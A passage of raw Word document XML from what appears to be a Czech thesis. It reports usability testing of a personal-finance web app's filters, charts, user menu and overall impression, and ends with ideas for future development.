      </w:fldSimple>
      <w:bookmarkEnd w:id="221"/>
      <w:r>
        <w:t>. Filtr transakcí.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="222"/>
    </w:p>
    <w:p w:rsidR="00DA1F11" w:rsidRDefault="00DA1F11" w:rsidP="00DA1F11">
      <w:r>
        <w:t>Veškeré statistiky se počítají pro transakce, které jsou vybrané na základě filtru (</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref386988611 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). V tomto filtru je možné zvolit časové období, účty a štítky, které uživatele zajímají. Tohle není na první pohled zřejmě dostatečně jasné, protože uživatelé </w:t>
      </w:r>
      <w:r w:rsidR="00681BEC">
        <w:t xml:space="preserve">nebyli </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">při pohledu na jednotlivé statistiky schopni </w:t>
      </w:r>
      <w:r w:rsidR="00681BEC">
        <w:t>říci</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, pro jaké období jsou statistiky platné. Pomohlo by </w:t>
      </w:r>
      <w:r w:rsidR="00681BEC">
        <w:t xml:space="preserve">uvádět </w:t>
      </w:r>
      <w:r>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="00681BEC">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">každé statistiky explicitně </w:t>
      </w:r>
      <w:r w:rsidR="00086530">
        <w:t>období</w:t>
      </w:r>
      <w:r w:rsidR="00681BEC">
        <w:t>, na jaké</w:t>
      </w:r>
      <w:r w:rsidR="00086530">
        <w:t xml:space="preserve"> se vztahuje</w:t>
      </w:r>
      <w:r>
        <w:t>, protože filtr je na začátku stránky a</w:t>
      </w:r>
      <w:r w:rsidR="002E050E">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">statistiky až na </w:t>
      </w:r>
      <w:r w:rsidR="00681BEC">
        <w:t>jejím konci.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00681BEC">
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>řípadně</w:t>
      </w:r>
      <w:r w:rsidR="00681BEC">
        <w:t xml:space="preserve"> by bylo možné</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> udělat časový filtr fixní, </w:t>
      </w:r>
      <w:r w:rsidR="00681BEC">
        <w:t>potom by</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> zůstával stále přichycený k horní části obrazovky a uživatelé jej měli na očích.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA1F11" w:rsidRDefault="00DA1F11" w:rsidP="00DA1F11">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Dalším problémem se ukázala aktuální implementace filtrování štítků a účtů, kdy modře </w:t>
      </w:r>
      <w:r w:rsidR="007D339C">
        <w:t xml:space="preserve">zvýrazněné štítky nebo účty jsou zahrnuty do statistik a bílé nikoliv. Tohle bylo uživatelům jasné. V případě, kdy ale uživatel zruší výběr úplně všech štítků </w:t>
      </w:r>
      <w:r w:rsidR="00681BEC">
        <w:t xml:space="preserve">(případně </w:t>
      </w:r>
      <w:r w:rsidR="007D339C">
        <w:t>účtů</w:t>
      </w:r>
      <w:r w:rsidR="00681BEC">
        <w:t>),</w:t>
      </w:r>
      <w:r w:rsidR="007D339C">
        <w:t xml:space="preserve"> se filtr chová stejně, jako kdyby </w:t>
      </w:r>
      <w:r w:rsidR="00681BEC">
        <w:t xml:space="preserve">byly </w:t>
      </w:r>
      <w:r w:rsidR="007D339C">
        <w:t>vybr</w:t>
      </w:r>
      <w:r w:rsidR="00681BEC">
        <w:t>ány</w:t>
      </w:r>
      <w:r w:rsidR="007D339C">
        <w:t xml:space="preserve"> všechny, což uživatele mátlo. Jasnější jim přijde varianta, kdy takové nastavení filtru nikdy nevrátí žádnou transakci.</w:t>
      </w:r>
      <w:r w:rsidR="00FE3DC8">
        <w:t xml:space="preserve"> Uživatelé ale ocenili možnost rychle vybrat všechny štítky nebo zrušit výběr všech štítků pomocí akčních tlačítek, což jim usnadnilo například vyb</w:t>
      </w:r>
      <w:r w:rsidR="00681BEC">
        <w:t>írání</w:t>
      </w:r>
      <w:r w:rsidR="00FE3DC8">
        <w:t xml:space="preserve"> pouze jednoho štítku.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005376A3" w:rsidRDefault="005376A3" w:rsidP="005376A3">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="223" w:name="_Toc387327897"/>
      <w:r>
        <w:t>Grafy</w:t>
      </w:r>
      <w:bookmarkEnd w:id="223"/>
    </w:p>
    <w:p w:rsidR="0083564B" w:rsidRPr="005376A3" w:rsidRDefault="007C78DC" w:rsidP="005376A3">
      <w:r>
        <w:t>Aplikace dokáže z transakcí vybraných na základě filtru vytvořit několik grafů. Graf příjmů, výdajů a bilance (</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref386990461 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>) byl uživatelům jasný, pouze v jednom případě uživatel ne</w:t>
      </w:r>
      <w:r w:rsidR="00617588">
        <w:t>rozuměl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pojm</w:t>
      </w:r>
      <w:r w:rsidR="00617588">
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> „bilance“ a ocenil by spíše použití slova „rozdíl“. </w:t>
      </w:r>
      <w:r w:rsidR="0083564B">
        <w:t>Graf vývoje stavu účtu (</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0083564B">
        <w:instrText xml:space="preserve"> REF _Ref386990772 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0083564B">
        <w:t xml:space="preserve">) byl </w:t>
      </w:r>
      <w:r w:rsidR="00410FE0">
        <w:t>pochopitelný pro</w:t>
      </w:r>
      <w:r w:rsidR="0083564B">
        <w:t xml:space="preserve"> vš</w:t>
      </w:r>
      <w:r w:rsidR="00410FE0">
        <w:t>echny</w:t>
      </w:r>
      <w:r w:rsidR="0083564B">
        <w:t xml:space="preserve"> uživatel</w:t>
      </w:r>
      <w:r w:rsidR="00410FE0">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="0083564B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005376A3" w:rsidRDefault="005D678B" w:rsidP="005376A3">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5580380" cy="3944661"/>
            <wp:effectExtent l="19050" t="0" r="1270"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9" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580380" cy="3944661"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005376A3" w:rsidRDefault="005376A3" w:rsidP="005376A3">
      <w:pPr>
        <w:pStyle w:val="Titulek"/>
      </w:pPr>
      <w:bookmarkStart w:id="224" w:name="_Ref386990461"/>
      <w:bookmarkStart w:id="225" w:name="_Toc387327931"/>
      <w:r>
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Obr. \* ARABIC ">
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>25</w:t>
        </w:r>
      </w:fldSimple>
      <w:bookmarkEnd w:id="224"/>
      <w:r>
        <w:t>. Graf příjmů, výdajů a bilance s aktivní anotací.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="225"/>
    </w:p>
    <w:p w:rsidR="00E31B9E" w:rsidRDefault="005D678B" w:rsidP="00E31B9E">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5580380" cy="4106317"/>
            <wp:effectExtent l="19050" t="0" r="127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print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580380" cy="4106317"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E31B9E" w:rsidRDefault="00E31B9E" w:rsidP="00E31B9E">
      <w:pPr>
        <w:pStyle w:val="Titulek"/>
      </w:pPr>
      <w:bookmarkStart w:id="226" w:name="_Ref386990772"/>
      <w:bookmarkStart w:id="227" w:name="_Toc387327932"/>
      <w:r>
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Obr. \* ARABIC ">
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>26</w:t>
        </w:r>
      </w:fldSimple>
      <w:bookmarkEnd w:id="226"/>
      <w:r>
        <w:t>. Graf vývoje stavu účtů s aktivní anotací.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="227"/>
    </w:p>
    <w:p w:rsidR="00E31B9E" w:rsidRDefault="005D678B" w:rsidP="00E31B9E">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5580380" cy="3786686"/>
            <wp:effectExtent l="19050" t="0" r="127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1" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580380" cy="3786686"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E31B9E" w:rsidRDefault="00E31B9E" w:rsidP="00E31B9E">
      <w:pPr>
        <w:pStyle w:val="Titulek"/>
      </w:pPr>
      <w:bookmarkStart w:id="228" w:name="_Ref386991120"/>
      <w:bookmarkStart w:id="229" w:name="_Toc387327933"/>
      <w:r>
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Obr. \* ARABIC ">
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
      </w:fldSimple>
      <w:bookmarkEnd w:id="228"/>
      <w:r>
        <w:t>. Graf podílu hlavních štítků na výdajích s aktivní anotací.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="229"/>
    </w:p>
    <w:p w:rsidR="005D678B" w:rsidRDefault="005D678B" w:rsidP="005D678B">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5580380" cy="2641889"/>
            <wp:effectExtent l="19050" t="0" r="127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srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580380" cy="2641889"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D678B" w:rsidRDefault="005D678B" w:rsidP="005D678B">
      <w:pPr>
        <w:pStyle w:val="Titulek"/>
      </w:pPr>
      <w:bookmarkStart w:id="230" w:name="_Ref386991300"/>
      <w:bookmarkStart w:id="231" w:name="_Toc387327934"/>
      <w:r>
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Obr. \* ARABIC ">
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>28</w:t>
        </w:r>
      </w:fldSimple>
      <w:bookmarkEnd w:id="230"/>
      <w:r>
        <w:t>. Graf podílu jednotlivých štítků na výdajích s aktivní anotací.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="231"/>
    </w:p>
    <w:p w:rsidR="0083564B" w:rsidRDefault="002E33D5" w:rsidP="0083564B">
      <w:r>
        <w:t>Graf podílu hlavních štítků na výdajích (</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref386991120 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>27</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>) uživatelé označili za nejzajímavější, protože z něj snadno zjistí strukturu svých výdajů. Padl námět na zlepšení, aby po najetí na část koláčového grafu aplikace zobrazila všechny transakce, které byly do dané části grafu započítány.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F230B" w:rsidRDefault="002E33D5" w:rsidP="0083564B">
      <w:r>
        <w:t xml:space="preserve">Nejasnosti </w:t>
      </w:r>
      <w:r w:rsidR="000C4EE9">
        <w:t xml:space="preserve">pro některé uživatele </w:t>
      </w:r>
      <w:r>
        <w:t>přinesl graf podílu štítků na výdajích (</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref386991300 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="008F230B">
        <w:t xml:space="preserve">, protože jednotlivé transakce jsou započítány ve více sloupcích grafu. Například transakce označené štítky </w:t>
      </w:r>
      <w:r w:rsidR="008F230B" w:rsidRPr="008F230B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Voda</w:t>
      </w:r>
      <w:r w:rsidR="008F230B">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008F230B" w:rsidRPr="008F230B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Plyn</w:t>
      </w:r>
      <w:r w:rsidR="008F230B">
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidR="008F230B" w:rsidRPr="008F230B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Elektřina</w:t>
      </w:r>
      <w:r w:rsidR="008F230B">
        <w:t xml:space="preserve"> jsou současně označeny štítkem </w:t>
      </w:r>
      <w:r w:rsidR="008F230B" w:rsidRPr="008F230B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Inkaso</w:t>
      </w:r>
      <w:r w:rsidR="008F230B">
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidR="008F230B" w:rsidRPr="008F230B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Domácnost</w:t>
      </w:r>
      <w:r w:rsidR="008F230B">
        <w:t>, takže jsou započteny také v těchto dvou sloupcích. Kromě toho je v</w:t>
      </w:r>
      <w:r w:rsidR="00597CAD">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="008F230B">
        <w:t xml:space="preserve"> výdajích za </w:t>
      </w:r>
      <w:r w:rsidR="008F230B" w:rsidRPr="008F230B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Domácnost</w:t>
      </w:r>
      <w:r w:rsidR="008F230B">
        <w:t xml:space="preserve"> započítáno také </w:t>
      </w:r>
      <w:r w:rsidR="008F230B" w:rsidRPr="008F230B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Jídlo</w:t>
      </w:r>
      <w:r w:rsidR="008F230B">
        <w:t>, které má ale přitom v grafu svůj vlastní sloupec.</w:t>
      </w:r>
      <w:r w:rsidR="004D1810">
        <w:t xml:space="preserve"> Toto chování vychází z podstaty zvolení </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004D1810">
        <w:t>nehierarchické</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004D1810">
        <w:t xml:space="preserve"> struktury kategorizace výdajů, na což </w:t>
      </w:r>
      <w:r w:rsidR="000C4EE9">
        <w:t xml:space="preserve">tito </w:t>
      </w:r>
      <w:r w:rsidR="004D1810">
        <w:t>uživatelé nejsou zvyklí</w:t>
      </w:r>
      <w:r w:rsidR="00042CFD">
        <w:t xml:space="preserve"> a je pro ně náročnější tento graf pochopit. Řešení by mohlo spočívat v tom, že po najetí na sloupec by byl zobrazen seznam transa</w:t>
      </w:r>
      <w:r w:rsidR="006A7630">
        <w:t xml:space="preserve">kcí, které jsou do něj zahrnuty, případně by si uživatel ke každé transakci přiřadil pouze jeden štítek a potom by </w:t>
      </w:r>
      <w:r w:rsidR="000C57DF">
        <w:t xml:space="preserve">sloupce </w:t>
      </w:r>
      <w:r w:rsidR="006A7630">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="000C57DF">
        <w:t>hoto</w:t>
      </w:r>
      <w:r w:rsidR="006A7630">
        <w:t xml:space="preserve"> graf</w:t>
      </w:r>
      <w:r w:rsidR="000C57DF">
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="006A7630">
        <w:t xml:space="preserve"> byl</w:t>
      </w:r>
      <w:r w:rsidR="000C57DF">
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidR="006A7630">
        <w:t xml:space="preserve"> disjunktní.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D94C5D" w:rsidRDefault="0083564B" w:rsidP="0083564B">
      <w:r>
        <w:t xml:space="preserve">Uživatelé intuitivně přišli na možnost anotovat zobrazená data po najetí kurzorem myši na bod grafu, který je zajímá a </w:t>
      </w:r>
      <w:r w:rsidR="006A6998">
        <w:t>ocenili ji</w:t>
      </w:r>
      <w:r w:rsidR="00D94C5D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00226140" w:rsidRDefault="00226140" w:rsidP="00226140">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="232" w:name="_Toc387327898"/>
      <w:r>
        <w:t>Změna hesla a odhlášení</w:t>
      </w:r>
      <w:bookmarkEnd w:id="232"/>
    </w:p>
    <w:p w:rsidR="00226140" w:rsidRDefault="00226140" w:rsidP="00226140">
      <w:r>
        <w:t>Nakonec byli uživatelé vyzvání ke změně hesla a odhlášení z aplikace. Obě dvě tyto možnosti jsou dostupné z vysouvacího uživatelského menu, které je umístěn</w:t>
      </w:r>
      <w:r w:rsidR="00CF0A38">
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> v pravém horním rohu obrazovky (</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref386992548 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>) a všichni testovaní uživatelé je intuitivně použili.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00226140" w:rsidRDefault="00226140" w:rsidP="00226140">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2445180" cy="961440"/>
            <wp:effectExtent l="19050" t="19050" r="12270" b="1011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3" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2447697" cy="962430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00226140" w:rsidRPr="00226140" w:rsidRDefault="00226140" w:rsidP="00226140">
      <w:pPr>
        <w:pStyle w:val="Titulek"/>
      </w:pPr>
      <w:bookmarkStart w:id="233" w:name="_Ref386992548"/>
      <w:bookmarkStart w:id="234" w:name="_Toc387327935"/>
      <w:r>
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Obr. \* ARABIC ">
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>29</w:t>
        </w:r>
      </w:fldSimple>
      <w:bookmarkEnd w:id="233"/>
      <w:r>
        <w:t>. Uživatelské menu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="234"/>
    </w:p>
    <w:p w:rsidR="0083564B" w:rsidRDefault="00D94C5D" w:rsidP="00D94C5D">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="235" w:name="_Toc387327899"/>
      <w:r>
        <w:t>Celkový dojem uživatelů</w:t>
      </w:r>
      <w:bookmarkEnd w:id="235"/>
    </w:p>
    <w:p w:rsidR="005D52EA" w:rsidRPr="005D52EA" w:rsidRDefault="005D52EA" w:rsidP="005D52EA">
      <w:r>
        <w:t>Celkový dojem uživatelů je veskrze pozitivní. Aplikaci označili za intuitivní a dokázali ji používat bez předchozích znalostí. Velmi oceňovali čistý a jednoduchý vzhled aplikace. Během se</w:t>
      </w:r>
      <w:r w:rsidR="00597CAD">
        <w:t>znamování se s aplikací vyvstaly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sice některé nejasnosti, ale na všechny dokázali uživatelé najít odpovědi sami tím, že aplikaci </w:t>
      </w:r>
      <w:r w:rsidR="0035096A">
        <w:t>chvíli</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> používali. Výjimkou je snad jen systém </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nehierarchických</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> štítků, který by si zasloužil lepší vysvětlení přímo v aplikaci. Uživatelé shodně uvedli, že by aplikaci používali již v takovém stavu, v jakém je nyní, protože nezaznamenali žádnou zásadní překážku, která by jim v použití aplikace bránila.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA1F11" w:rsidRPr="00DA1F11" w:rsidRDefault="00DA1F11" w:rsidP="00DA1F11"/>
    <w:p w:rsidR="00B525C2" w:rsidRPr="003C3898" w:rsidRDefault="00B525C2" w:rsidP="003C3898"/>
    <w:p w:rsidR="00F33088" w:rsidRPr="00F33088" w:rsidRDefault="00F33088" w:rsidP="00F33088"/>
    <w:p w:rsidR="00F3033A" w:rsidRDefault="00F3033A" w:rsidP="00F3033A">
      <w:pPr>
        <w:pStyle w:val="Nadpis1"/>
      </w:pPr>
      <w:bookmarkStart w:id="236" w:name="_Ref386046378"/>
      <w:bookmarkStart w:id="237" w:name="_Toc387327900"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Další rozvoj aplikace</w:t>
      </w:r>
      <w:bookmarkEnd w:id="236"/>
      <w:bookmarkEnd w:id="237"/>
    </w:p>
    <w:p w:rsidR="00514B6E" w:rsidRDefault="00514B6E" w:rsidP="00F3033A">
      <w:r>
        <w:t>Aplikace by v budoucnu mohla být rozšířena o další funkcionalitu, která s evidencí osobních financí souvisí. Příkladem může být evidenc</w:t>
      </w:r>
      <w:r w:rsidR="00597CAD">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> spotřeby energií v domácnosti, ze které by bylo možné dělat zajímavé statistiky. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A2952" w:rsidRDefault="00514B6E" w:rsidP="00F3033A">
      <w:r>
        <w:t>Správa vozidel by mohla být rozšířena o možnost vytváření vlastních servisních plánů jednotlivých vozidel, kde by si uživatel mohl sám určit akce, které je třeba provádět po uplynutí určité doby nebo ujetí daného počtu kilometrů. Aplikace by potom uživatele s předstihem upozorňovala na blížící se servis vozidla, jaké úkony bude nutné provést vzhledem k ujetým kilometrům a  zobrazila</w:t>
      </w:r>
      <w:r w:rsidR="002E64F0">
        <w:t xml:space="preserve"> by</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> předpokládané výdaje vycházející z historický</w:t>
      </w:r>
      <w:r w:rsidR="00655015">
        <w:t>ch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dat o předešlých servisech.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514B6E" w:rsidRDefault="00514B6E" w:rsidP="00F3033A">
      <w:r>
        <w:t>Důležitou funkcí, kterou zmínili také uživatelé při testování prototypu, by b</w:t>
      </w:r>
      <w:r w:rsidR="002E64F0">
        <w:t>yl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> import transakcí z výpisů účtu českých bank nebo ještě lépe</w:t>
      </w:r>
      <w:r w:rsidR="004D0807">
